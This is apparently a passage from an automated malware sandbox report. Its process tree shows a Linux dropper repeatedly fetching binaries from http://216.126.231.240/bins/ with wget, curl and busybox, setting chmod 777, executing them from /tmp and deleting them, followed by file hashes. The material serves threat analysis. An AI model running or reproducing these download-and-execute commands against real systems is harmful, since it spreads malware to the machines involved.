/bin/rmrm YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:938
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:940
-
-
/bin/chmodchmod 777 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1./JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:943
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:944
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:946
-
-
/bin/chmodchmod 777 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik./Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:949
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:950
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:952
-
-
/bin/chmodchmod 777 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt./BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:955
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:956
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:958
-
-
/bin/chmodchmod 777 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN./nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:961
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:962
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:964
-
-
/bin/chmodchmod 777 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T./0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:967
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:968
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:970
-
-
/bin/chmodchmod 777 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK./PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:973
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:974
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:976
-
-
/bin/chmodchmod 777 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM./Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:979
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:980
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:982
-
-
/bin/chmodchmod 777 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk./tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:985
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97